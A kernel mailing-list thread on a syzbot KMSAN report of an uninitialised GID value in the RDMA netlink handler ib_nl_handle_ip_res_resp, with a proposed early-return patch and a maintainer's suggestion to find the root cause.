mirror of https://lore.kernel.org/lkml/
 help / color / mirror / Atom feed
* [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp
@ 2025-09-30 20:29 syzbot
  2025-10-01  3:02 ` Kohei Enju
                   ` (6 more replies)
  0 siblings, 7 replies; 25+ messages in thread
From: syzbot @ 2025-09-30 20:29 UTC (permalink / raw)
  To: jgg, leon, linux-kernel, linux-rdma, syzkaller-bugs

Hello,

syzbot found the following issue on:

HEAD commit:    1896ce8eb6c6 Merge tag 'fsverity-for-linus' of git://git.k..
git tree:       upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=153d0092580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=6eca10e0cdef44f
dashboard link: https://syzkaller.appspot.com/bug?extid=938fcd548c303fe33c1a
compiler:       Debian clang version 20.1.8 (++20250708063551+0c9f909b7976-1~exp1~20250708183702.136), Debian LLD 20.1.8
userspace arch: i386

Unfortunately, I don't have any reproducer for this issue yet.

Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/d0fbab3c0b62/disk-1896ce8e.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/71c7b444e106/vmlinux-1896ce8e.xz
kernel image: https://storage.googleapis.com/syzbot-assets/96a4aa63999d/bzImage-1896ce8e.xz

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+938fcd548c303fe33c1a@syzkaller.appspotmail.com

netlink: 8 bytes leftover after parsing attributes in process `syz.8.3246'.
=====================================================
BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
 hex_byte_pack include/linux/hex.h:13 [inline]
 ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
 ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
 ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
 pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
 vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
 vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
 vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
 vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
 vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
 _printk+0x17e/0x1b0 kernel/printk/printk.c:2475
 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
 ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
 rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
 rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
 netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
 netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
 sock_sendmsg_nosec net/socket.c:714 [inline]
 __sock_sendmsg+0x333/0x3d0 net/socket.c:729
 ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
 ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
 __sys_sendmsg+0x1aa/0x300 net/socket.c:2703
 __compat_sys_sendmsg net/compat.c:346 [inline]
 __do_compat_sys_sendmsg net/compat.c:353 [inline]
 __se_compat_sys_sendmsg net/compat.c:350 [inline]
 __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
 ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
 do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
 __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
 do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
 do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:369
 entry_SYSENTER_compat_after_hwframe+0x84/0x8e

Local variable gid.i created at:
 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:102 [inline]
 ib_nl_handle_ip_res_resp+0x254/0x9d0 drivers/infiniband/core/addr.c:141
 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
 rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
 rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259

CPU: 0 UID: 0 PID: 17455 Comm: syz.8.3246 Not tainted syzkaller #0 PREEMPT(none) 
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025
=====================================================


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Re: [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
@ 2025-10-01  3:02 ` Kohei Enju
  2025-10-02 18:16   ` yanjun.zhu
  2025-10-25 16:40 ` syzbot
                   ` (5 subsequent siblings)
  6 siblings, 1 reply; 25+ messages in thread
From: Kohei Enju @ 2025-10-01  3:02 UTC (permalink / raw)
  To: syzbot+938fcd548c303fe33c1a
  Cc: jgg, leon, linux-kernel, linux-rdma, syzkaller-bugs

On Tue, 30 Sep 2025 13:29:32 -0700, syzbot wrote:

>Hello,
>
>syzbot found the following issue on:
>
>HEAD commit:    1896ce8eb6c6 Merge tag 'fsverity-for-linus' of git://git.k..
>git tree:       upstream
>console output: https://syzkaller.appspot.com/x/log.txt?x=153d0092580000
>kernel config:  https://syzkaller.appspot.com/x/.config?x=6eca10e0cdef44f
>dashboard link: https://syzkaller.appspot.com/bug?extid=938fcd548c303fe33c1a
>compiler:       Debian clang version 20.1.8 (++20250708063551+0c9f909b7976-1~exp1~20250708183702.136), Debian LLD 20.1.8
>userspace arch: i386
>
>Unfortunately, I don't have any reproducer for this issue yet.
>
>Downloadable assets:
>disk image: https://storage.googleapis.com/syzbot-assets/d0fbab3c0b62/disk-1896ce8e.raw.xz
>vmlinux: https://storage.googleapis.com/syzbot-assets/71c7b444e106/vmlinux-1896ce8e.xz
>kernel image: https://storage.googleapis.com/syzbot-assets/96a4aa63999d/bzImage-1896ce8e.xz
>
>IMPORTANT: if you fix the issue, please add the following tag to the commit:
>Reported-by: syzbot+938fcd548c303fe33c1a@syzkaller.appspotmail.com
>
>netlink: 8 bytes leftover after parsing attributes in process `syz.8.3246'.
>=====================================================
>BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
>BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
> hex_byte_pack include/linux/hex.h:13 [inline]
> ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
> ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
> ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
> pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
> vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
> vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
> vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
> vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
> vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
> _printk+0x17e/0x1b0 kernel/printk/printk.c:2475
> ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]

I see when gid is not initialized in nla_for_each_attr loop, this should
return early.

I think the splat occurrs when gid is not found, so a simple fix might
be like:

diff --git a/drivers/infiniband/core/addr.c b/drivers/infiniband/core/addr.c
index be0743dac3ff..c03a308bcda5 100644
--- a/drivers/infiniband/core/addr.c
+++ b/drivers/infiniband/core/addr.c
@@ -103,15 +103,21 @@ static void ib_nl_process_good_ip_rsep(const struct nlmsghdr *nlh)
        struct addr_req *req;
        int len, rem;
        int found = 0;
+       bool gid_found = false;

        head = (const struct nlattr *)nlmsg_data(nlh);
        len = nlmsg_len(nlh);

        nla_for_each_attr(curr, head, len, rem) {
-               if (curr->nla_type == LS_NLA_TYPE_DGID)
+               if (curr->nla_type == LS_NLA_TYPE_DGID) {
                        memcpy(&gid, nla_data(curr), nla_len(curr));
+                       gid_found = true;
+               }
        }

+       if (!gid_found)
+               return;
+
        spin_lock_bh(&lock);
        list_for_each_entry(req, &req_list, list) {
                if (nlh->nlmsg_seq != req->seq)

> ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
> rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
> rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
> rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
> netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
> netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
> netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
> sock_sendmsg_nosec net/socket.c:714 [inline]
> __sock_sendmsg+0x333/0x3d0 net/socket.c:729
> ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
> ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
> __sys_sendmsg+0x1aa/0x300 net/socket.c:2703
> __compat_sys_sendmsg net/compat.c:346 [inline]
> __do_compat_sys_sendmsg net/compat.c:353 [inline]
> __se_compat_sys_sendmsg net/compat.c:350 [inline]
> __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
> ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
> do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
> __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
> do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
> do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:369
> entry_SYSENTER_compat_after_hwframe+0x84/0x8e
>
>Local variable gid.i created at:
> ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:102 [inline]
> ib_nl_handle_ip_res_resp+0x254/0x9d0 drivers/infiniband/core/addr.c:141
> rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
> rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
> rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
>
>CPU: 0 UID: 0 PID: 17455 Comm: syz.8.3246 Not tainted syzkaller #0 PREEMPT(none) 
>Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025
>=====================================================
>
>
>---
>This report is generated by a bot. It may contain errors.
>See https://goo.gl/tpsmEJ for more information about syzbot.
>syzbot engineers can be reached at syzkaller@googlegroups.com.
>
>syzbot will keep track of this issue. See:
>https://goo.gl/tpsmEJ#status for how to communicate with syzbot.
>
>If the report is already addressed, let syzbot know by replying with:
>#syz fix: exact-commit-title
>
>If you want to overwrite report's subsystems, reply with:
>#syz set subsystems: new-subsystem
>(See the list of subsystem names on the web dashboard)
>
>If the report is a duplicate of another one, reply with:
>#syz dup: exact-subject-of-another-report
>
>If you want to undo deduplication, reply with:
>#syz undup
>

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Re: [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp
  2025-10-01  3:02 ` Kohei Enju
@ 2025-10-02 18:16   ` yanjun.zhu
  2025-10-02 18:31     ` Kohei Enju
  0 siblings, 1 reply; 25+ messages in thread
From: yanjun.zhu @ 2025-10-02 18:16 UTC (permalink / raw)
  To: Kohei Enju, syzbot+938fcd548c303fe33c1a
  Cc: jgg, leon, linux-kernel, linux-rdma, syzkaller-bugs

On 9/30/25 8:02 PM, Kohei Enju wrote:
> On Tue, 30 Sep 2025 13:29:32 -0700, syzbot wrote:
> 
>> Hello,
>>
>> syzbot found the following issue on:
>>
>> HEAD commit:    1896ce8eb6c6 Merge tag 'fsverity-for-linus' of git://git.k..
>> git tree:       upstream
>> console output: https://syzkaller.appspot.com/x/log.txt?x=153d0092580000
>> kernel config:  https://syzkaller.appspot.com/x/.config?x=6eca10e0cdef44f
>> dashboard link: https://syzkaller.appspot.com/bug?extid=938fcd548c303fe33c1a
>> compiler:       Debian clang version 20.1.8 (++20250708063551+0c9f909b7976-1~exp1~20250708183702.136), Debian LLD 20.1.8
>> userspace arch: i386
>>
>> Unfortunately, I don't have any reproducer for this issue yet.
>>
>> Downloadable assets:
>> disk image: https://storage.googleapis.com/syzbot-assets/d0fbab3c0b62/disk-1896ce8e.raw.xz
>> vmlinux: https://storage.googleapis.com/syzbot-assets/71c7b444e106/vmlinux-1896ce8e.xz
>> kernel image: https://storage.googleapis.com/syzbot-assets/96a4aa63999d/bzImage-1896ce8e.xz
>>
>> IMPORTANT: if you fix the issue, please add the following tag to the commit:
>> Reported-by: syzbot+938fcd548c303fe33c1a@syzkaller.appspotmail.com
>>
>> netlink: 8 bytes leftover after parsing attributes in process `syz.8.3246'.
>> =====================================================
>> BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
>> BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
>> hex_byte_pack include/linux/hex.h:13 [inline]
>> ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
>> ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
>> ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
>> pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
>> vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
>> vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
>> vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
>> vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
>> vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
>> _printk+0x17e/0x1b0 kernel/printk/printk.c:2475
>> ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
> 
> I see when gid is not initialized in nla_for_each_attr loop, this should
> return early.

GID is a globally unique 128-bit identifier for an RDMA port, used for 
addressing and routing in InfiniBand or RoCE networks. It’s crucial for 
establishing RDMA connections across subnets or Ethernet networks. IMO, 
we do not just return when gid is not found. We should find out why the 
GID does not exist if I get you correctly.

Then we can fix this problem where the GID can not be added into GID table.

It is just my 2 cent advice.

Yanjun.Zhu

> 
> I think the splat occurrs when gid is not found, so a simple fix might
> be like:
> 
> diff --git a/drivers/infiniband/core/addr.c b/drivers/infiniband/core/addr.c
> index be0743dac3ff..c03a308bcda5 100644
> --- a/drivers/infiniband/core/addr.c
> +++ b/drivers/infiniband/core/addr.c
> @@ -103,15 +103,21 @@ static void ib_nl_process_good_ip_rsep(const struct nlmsghdr *nlh)
>          struct addr_req *req;
>          int len, rem;
>          int found = 0;
> +       bool gid_found = false;
> 
>          head = (const struct nlattr *)nlmsg_data(nlh);
>          len = nlmsg_len(nlh);
> 
>          nla_for_each_attr(curr, head, len, rem) {
> -               if (curr->nla_type == LS_NLA_TYPE_DGID)
> +               if (curr->nla_type == LS_NLA_TYPE_DGID) {
>                          memcpy(&gid, nla_data(curr), nla_len(curr));
> +                       gid_found = true;
> +               }
>          }
> 
> +       if (!gid_found)
> +               return;
> +
>          spin_lock_bh(&lock);
>          list_for_each_entry(req, &req_list, list) {
>                  if (nlh->nlmsg_seq != req->seq)
> 
>> ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
>> rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
>> rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
>> rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
>> netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
>> netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
>> netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
>> sock_sendmsg_nosec net/socket.c:714 [inline]
>> __sock_sendmsg+0x333/0x3d0 net/socket.c:729
>> ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
>> ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
>> __sys_sendmsg+0x1aa/0x300 net/socket.c:2703
>> __compat_sys_sendmsg net/compat.c:346 [inline]
>> __do_compat_sys_sendmsg net/compat.c:353 [inline]
>> __se_compat_sys_sendmsg net/compat.c:350 [inline]
>> __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
>> ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
>> do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
>> __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
>> do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
>> do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:369
>> entry_SYSENTER_compat_after_hwframe+0x84/0x8e
>>
>> Local variable gid.i created at:
>> ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:102 [inline]
>> ib_nl_handle_ip_res_resp+0x254/0x9d0 drivers/infiniband/core/addr.c:141
>> rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
>> rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
>> rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
>>
>> CPU: 0 UID: 0 PID: 17455 Comm: syz.8.3246 Not tainted syzkaller #0 PREEMPT(none)
>> Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025
>> =====================================================
>>
>>
>> ---
>> This report is generated by a bot. It may contain errors.
>> See https://goo.gl/tpsmEJ for more information about syzbot.
>> syzbot engineers can be reached at syzkaller@googlegroups.com.
>>
>> syzbot will keep track of this issue. See:
>> https://goo.gl/tpsmEJ#status for how to communicate with syzbot.
>>
>> If the report is already addressed, let syzbot know by replying with:
>> #syz fix: exact-commit-title
>>
>> If you want to overwrite report's subsystems, reply with:
>> #syz set subsystems: new-subsystem
>> (See the list of subsystem names on the web dashboard)
>>
>> If the report is a duplicate of another one, reply with:
>> #syz dup: exact-subject-of-another-report
>>
>> If you want to undo deduplication, reply with:
>> #syz undup
>>


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Re: [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp
  2025-10-02 18:16   ` yanjun.zhu
@ 2025-10-02 18:31     ` Kohei Enju
  0 siblings, 0 replies; 25+ messages in thread
From: Kohei Enju @ 2025-10-02 18:31 UTC (permalink / raw)
  To: yanjun.zhu
  Cc: enjuk, jgg, leon, linux-kernel, linux-rdma,
	syzbot+938fcd548c303fe33c1a, syzkaller-bugs

On Thu, 2 Oct 2025 11:16:46 -0700, yanjun.zhu wrote:

>On 9/30/25 8:02 PM, Kohei Enju wrote:
>> On Tue, 30 Sep 2025 13:29:32 -0700, syzbot wrote:
>> 
>>> Hello,
>>>
>>> syzbot found the following issue on:
>>>
>>> HEAD commit:    1896ce8eb6c6 Merge tag 'fsverity-for-linus' of git://git.k..
>>> git tree:       upstream
>>> console output: https://syzkaller.appspot.com/x/log.txt?x=153d0092580000
>>> kernel config:  https://syzkaller.appspot.com/x/.config?x=6eca10e0cdef44f
>>> dashboard link: https://syzkaller.appspot.com/bug?extid=938fcd548c303fe33c1a
>>> compiler:       Debian clang version 20.1.8 (++20250708063551+0c9f909b7976-1~exp1~20250708183702.136), Debian LLD 20.1.8
>>> userspace arch: i386
>>>
>>> Unfortunately, I don't have any reproducer for this issue yet.
>>>
>>> Downloadable assets:
>>> disk image: https://storage.googleapis.com/syzbot-assets/d0fbab3c0b62/disk-1896ce8e.raw.xz
>>> vmlinux: https://storage.googleapis.com/syzbot-assets/71c7b444e106/vmlinux-1896ce8e.xz
>>> kernel image: https://storage.googleapis.com/syzbot-assets/96a4aa63999d/bzImage-1896ce8e.xz
>>>
>>> IMPORTANT: if you fix the issue, please add the following tag to the commit:
>>> Reported-by: syzbot+938fcd548c303fe33c1a@syzkaller.appspotmail.com
>>>
>>> netlink: 8 bytes leftover after parsing attributes in process `syz.8.3246'.
>>> =====================================================
>>> BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
>>> BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
>>> hex_byte_pack include/linux/hex.h:13 [inline]
>>> ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
>>> ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
>>> ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
>>> pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
>>> vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
>>> vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
>>> vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
>>> vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
>>> vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
>>> _printk+0x17e/0x1b0 kernel/printk/printk.c:2475
>>> ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
>> 
>> I see when gid is not initialized in nla_for_each_attr loop, this should
>> return early.
>
>GID is a globally unique 128-bit identifier for an RDMA port, used for 
>addressing and routing in InfiniBand or RoCE networks. It\u2019s crucial for 
>establishing RDMA connections across subnets or Ethernet networks. IMO, 
>we do not just return when gid is not found. We should find out why the 
>GID does not exist if I get you correctly.

Indeed, I think you're right.
Considering that ib_nl_is_good_ip_resp() returns true, the fact that GID
doesn't exist seems weird and we should investigate the cause.

>
>Then we can fix this problem where the GID can not be added into GID table.
>
>It is just my 2 cent advice.
>
>Yanjun.Zhu
>
>> 
>> I think the splat occurrs when gid is not found, so a simple fix might
>> be like:
>> 
>> diff --git a/drivers/infiniband/core/addr.c b/drivers/infiniband/core/addr.c
>> index be0743dac3ff..c03a308bcda5 100644
>> --- a/drivers/infiniband/core/addr.c
>> +++ b/drivers/infiniband/core/addr.c
>> @@ -103,15 +103,21 @@ static void ib_nl_process_good_ip_rsep(const struct nlmsghdr *nlh)
>>          struct addr_req *req;
>>          int len, rem;
>>          int found = 0;
>> +       bool gid_found = false;
>> 
>>          head = (const struct nlattr *)nlmsg_data(nlh);
>>          len = nlmsg_len(nlh);
>> 
>>          nla_for_each_attr(curr, head, len, rem) {
>> -               if (curr->nla_type == LS_NLA_TYPE_DGID)
>> +               if (curr->nla_type == LS_NLA_TYPE_DGID) {
>>                          memcpy(&gid, nla_data(curr), nla_len(curr));
>> +                       gid_found = true;
>> +               }
>>          }
>> 
>> +       if (!gid_found)
>> +               return;
>> +
>>          spin_lock_bh(&lock);
>>          list_for_each_entry(req, &req_list, list) {
>>                  if (nlh->nlmsg_seq != req->seq)
>> 
>>> ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
>>> rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
>>> rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
>>> rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
>>> netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
>>> netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
>>> netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
>>> sock_sendmsg_nosec net/socket.c:714 [inline]
>>> __sock_sendmsg+0x333/0x3d0 net/socket.c:729
>>> ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
>>> ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
>>> __sys_sendmsg+0x1aa/0x300 net/socket.c:2703
>>> __compat_sys_sendmsg net/compat.c:346 [inline]
>>> __do_compat_sys_sendmsg net/compat.c:353 [inline]
>>> __se_compat_sys_sendmsg net/compat.c:350 [inline]
>>> __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
>>> ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
>>> do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
>>> __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
>>> do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
>>> do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:369
>>> entry_SYSENTER_compat_after_hwframe+0x84/0x8e
>>>
>>> Local variable gid.i created at:
>>> ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:102 [inline]
>>> ib_nl_handle_ip_res_resp+0x254/0x9d0 drivers/infiniband/core/addr.c:141
>>> rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
>>> rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
>>> rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
>>>
>>> CPU: 0 UID: 0 PID: 17455 Comm: syz.8.3246 Not tainted syzkaller #0 PREEMPT(none)
>>> Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025
>>> =====================================================
>>>
>>>
>>> ---
>>> This report is generated by a bot. It may contain errors.
>>> See https://goo.gl/tpsmEJ for more information about syzbot.
>>> syzbot engineers can be reached at syzkaller@googlegroups.com.
>>>
>>> syzbot will keep track of this issue. See:
>>> https://goo.gl/tpsmEJ#status for how to communicate with syzbot.
>>>
>>> If the report is already addressed, let syzbot know by replying with:
>>> #syz fix: exact-commit-title
>>>
>>> If you want to overwrite report's subsystems, reply with:
>>> #syz set subsystems: new-subsystem
>>> (See the list of subsystem names on the web dashboard)
>>>
>>> If the report is a duplicate of another one, reply with:
>>> #syz dup: exact-subject-of-another-report
>>>
>>> If you want to undo deduplication, reply with:
>>> #syz undup
>>>
>
>

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Re: [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
  2025-10-01  3:02 ` Kohei Enju
@ 2025-10-25 16:40 ` syzbot
  2025-11-06 19:28 ` Forwarded: test syzbot
                   ` (4 subsequent siblings)
  6 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-10-25 16:40 UTC (permalink / raw)
  To: enjuk, jgg, leon, linux-kernel, linux-rdma, syzkaller-bugs, yanjun.zhu

syzbot has found a reproducer for the following issue on:

HEAD commit:    566771afc7a8 Merge tag 'v6.18-rc2-smb-server-fixes' of git..
git tree:       upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=12f017e2580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=dce7eac4016da338
dashboard link: https://syzkaller.appspot.com/bug?extid=938fcd548c303fe33c1a
compiler:       Debian clang version 20.1.8 (++20250708063551+0c9f909b7976-1~exp1~20250708183702.136), Debian LLD 20.1.8
syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=13714be2580000
C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=100b5d2f980000

Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/bc5e0bc7a5d9/disk-566771af.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/6b2be7ad3b45/vmlinux-566771af.xz
kernel image: https://storage.googleapis.com/syzbot-assets/09a4929333f1/bzImage-566771af.xz

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+938fcd548c303fe33c1a@syzkaller.appspotmail.com

netlink: 8 bytes leftover after parsing attributes in process `syz.0.18'.
=====================================================
BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
 hex_byte_pack include/linux/hex.h:13 [inline]
 ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
 ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
 ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
 pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
 vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
 vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2252
 vprintk_emit+0x21a/0xb60 kernel/printk/printk.c:2399
 vprintk_default+0x3f/0x50 kernel/printk/printk.c:2438
 vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
 _printk+0x17e/0x1b0 kernel/printk/printk.c:2448
 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
 ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
 rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
 rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
 netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
